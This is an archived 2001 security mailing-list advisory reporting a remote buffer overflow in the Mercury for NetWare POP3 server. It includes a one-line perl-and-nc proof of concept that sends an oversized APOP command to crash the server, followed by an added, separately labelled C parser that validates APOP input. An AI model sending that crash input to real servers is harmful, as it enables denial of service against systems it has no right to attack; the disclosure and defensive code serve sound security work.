Mercury for NetWare POP3 server vulnerable to remote buffer overflow

From: Przemyslaw Frasunek (venglinat_private)
Date: Sat Apr 21 2001 - 01:52:15 PDT


    Hello,
    
    All versions of the widely used POP3 server from the Mercury MTA package for
    NetWare are vulnerable to a remote buffer overflow that allows crashing the
    NetWare server:
    
    perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
    
    Remote execution of malicious code is also theoretically possible.
    
    --
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
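
A defensive counterpart to the report above, added here as an example; it is not part of the original post and not Mercury's code. It parses an APOP line in C and enforces the RFC 1939 limits (arguments of at most 40 characters, a digest of 32 lower-case hex digits) before anything is copied. The names `parse_apop`, `struct apop_args` and the macros are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* RFC 1939: each argument is at most 40 characters; the APOP digest is an
   MD5 value written as 32 lower-case hexadecimal digits. */
#define POP3_ARG_MAX    40
#define APOP_DIGEST_LEN 32
/* "APOP" SP name SP digest CRLF */
#define APOP_LINE_MAX   (4 + 1 + POP3_ARG_MAX + 1 + APOP_DIGEST_LEN + 2)

struct apop_args {                      /* hypothetical result type */
    char name[POP3_ARG_MAX + 1];
    char digest[APOP_DIGEST_LEN + 1];
};

/* Parse one received line of `len` bytes (not assumed NUL-terminated).
   Returns 0 on success, -1 on any violation; copies only validated lengths. */
int parse_apop(const char *line, size_t len, struct apop_args *out)
{
    size_t i;
    if (len < 7 || len > APOP_LINE_MAX) return -1;   /* reject before parsing */
    if (line[len - 2] != '\r' || line[len - 1] != '\n') return -1;
    len -= 2;
    for (i = 0; i < 4; i++)                          /* keyword, any case */
        if (toupper((unsigned char)line[i]) != "APOP"[i]) return -1;
    if (line[4] != ' ') return -1;
    const char *p = line + 5, *end = line + len;
    const char *sp = memchr(p, ' ', (size_t)(end - p));
    if (!sp) return -1;                              /* digest missing */
    size_t nlen = (size_t)(sp - p), dlen = (size_t)(end - sp - 1);
    if (nlen == 0 || nlen > POP3_ARG_MAX || dlen != APOP_DIGEST_LEN) return -1;
    for (i = 0; i < nlen; i++)                       /* printable, no spaces */
        if (!isgraph((unsigned char)p[i])) return -1;
    for (i = 0; i < dlen; i++) {
        char c = sp[1 + i];
        if (!(isdigit((unsigned char)c) || (c >= 'a' && c <= 'f'))) return -1;
    }
    memcpy(out->name, p, nlen);        out->name[nlen] = '\0';
    memcpy(out->digest, sp + 1, dlen); out->digest[dlen] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample line, not taken from the original post. */
    const char ok[] = "APOP mrose c4c9334bac560ecc979e58001b3e22fb\r\n";
    struct apop_args a;
    int rc = parse_apop(ok, sizeof ok - 1, &a);
    if (rc == 0) printf("name=%s digest=%s\n", a.name, a.digest);
    return rc == 0 ? 0 : 1;
}
```

The receive loop feeding this function must itself stop reading at a fixed line length; the length check here only protects the parsing step.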
    



    This archive was generated by hypermail 2b30 : Sun Apr 22 2001 - 14:28:14 PDT